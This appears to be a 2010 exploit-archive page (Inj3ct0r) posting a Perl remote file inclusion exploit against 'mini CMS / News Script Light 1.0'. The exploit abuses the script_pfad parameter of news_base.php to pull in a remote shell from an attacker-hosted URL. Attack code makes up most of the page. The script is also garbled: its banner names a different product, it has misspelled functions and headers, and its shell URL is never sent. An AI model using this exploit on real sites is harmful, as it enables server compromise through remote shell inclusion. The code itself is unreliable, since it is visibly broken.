mini CMS / News Script Light 1.0 Remote File Include Exploit
Posted on 26 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>mini CMS / News Script Light 1.0 Remote File Include Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================ mini CMS / News Script Light 1.0 Remote File Include Exploit ============================================================ ######################################################## # # # HINNENDAHL.COM Gaestebuch 1.2 # # # # Remote File Inclusion Vulnerability # # # # by bd0rk || SOH-Crew # # # # www.soh-crew.it.tt # # # # Contact: bd0rk[at]hackermail.com # # # ######################################################## #!/usr/bin/perl #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # mini CMS / News Script Light 1.0 Remote File Include Exploit # # Bug found and exploit written by bd0rk || SOH-Crew # # Vendor: http://www.hinnendahl.com/ # # Downloadsite: http://www.hinnendahl.com/index.php?seite=download # # Description: The script_pfad parameter in news_base.php isn't declared before require # # Contact: bd0rk[at]hackermail.com # Website: www.soh-crew.it.tt #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use Getopt::Long; use URI::Escape; use IO::Socket; $shellcode = "http://yourshellsite.com"; main(); sub usage { print "mini CMS / News Script Lite 1.0 Remote File Include Exploit "; print "Bug found and Exploit written by bd0rk "; print "-1, --target target (yourhost.com) "; print "-2, --shellpath shell (http://yourshellsite.com) "; print "-3, --dir Directory (/news_system) "; exit; } sub main { GetOptions ('1|target=s' => $target, '2|shellpath=s' => $shellpath,'3|dir=s' => $dir); usage() unless $target; $shellcode = $shellpath unless !$shellpath; $targethost = uri_escape($shellcode); $socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die " Connection() Failed. "; print " Connected to ".$target.", Attacking host... "; $bd0rk = "inst=true&ins_file=".$target.""; $soh = lenght($bd0rk); print $socket "POST ".$dir."/news_system/news_base.php?script_pfad= HTTP/1.1 "; print $socket "Target: ".$target." "; print $socket "Connection: close "; print $socket "Content-Type: application/x-www-form-urlencoded "; print $socket "Content-Lenght: ".$soh." "; print $socket $soh; print "Server-Response: "; { print " ".$recvd.""; } exit; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
